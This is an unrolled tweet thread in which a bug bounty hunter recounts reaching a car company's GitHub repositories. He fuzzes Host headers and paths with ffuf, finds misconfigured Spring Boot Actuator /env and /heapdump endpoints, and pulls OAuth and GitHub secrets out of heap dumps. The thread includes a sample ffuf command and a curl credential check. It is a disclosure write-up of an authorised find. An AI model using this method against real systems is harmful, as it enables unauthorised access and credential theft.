Corben Leo
Aug 21, 2023 (12 tweets)
I hacked a car company.

Here's how I gained access to hundreds of their codebases.
1. This company ran a bug bounty program.

I came across a web server that responded with:

> 404 Not Found: Requested route ('example.apps.███.com')
2. This is likely an ingress controller.

Seeing "404 Not Found" and

• the Host header reflected in the response
• the word "route" in the response

made me believe it was.

What's an ingress controller?
3. TL;DR: They route HTTP requests to different services.

Typically using the Host header and/or a path.

So, I started brute-forcing the host headers:

I got a hit:

> configurator-prod.apps.███.com
4. I wasn't sure what this was.

So, I brute-forced paths on the host:

$ ffuf -u ██/FUZZ -H "Host: configurator-prod.apps.███.com" -mc all

> /env – "200 OK"
> /heapdump – "200 OK"

It was running Spring Boot Actuator & it was misconfigured.
5. The /env endpoint didn't contain much.

I also couldn't POST to it to achieve RCE.

It did contain:

• A "config server" URL (config-server-UUID.apps.███)
• And an oauth2 endpoint + credentials (to authenticate to the referenced server)

But, the password was redacted.
6. Remember the "/heapdump" endpoint?

Heap dumps are a snapshot of objects in memory for an application.

That includes the credentials...

So, I grabbed the credentials by:
• Downloading the heap dump using wget.
• Running strings & grepping for the client secret

Got 'em.
7. Now, I wanted to:

• Use these oauth2 credentials
• Hit the newly found config server for "configurator-prod"
• Fuzz it for endpoints

So, I used the oauth2 endpoint (leaked in the accessTokenURI)

+ the leaked credentials and got an access token:
8. Then, I used it to access the config-server and fuzzed for endpoints.

Turns out, it was Spring Boot Actuator…

and misconfigured…again.

The /env & /heapdump endpoints were exposed.
9. In the /env response were GitHub credentials...

And the private key for the user.

I grabbed the password using the /heapdump endpoint.
10. I checked if the credentials were valid:

$ curl -u gops:abc123...

They were.

I could now access 30+ GitHub orgs.

And I had read/write access to hundreds of repositories.

github.example.com/api/v3/user
11. I reported it to their bug bounty program.

Unfortunately, I didn't get a cool new car 😢

But I guess $5,000 wasn't too bad.
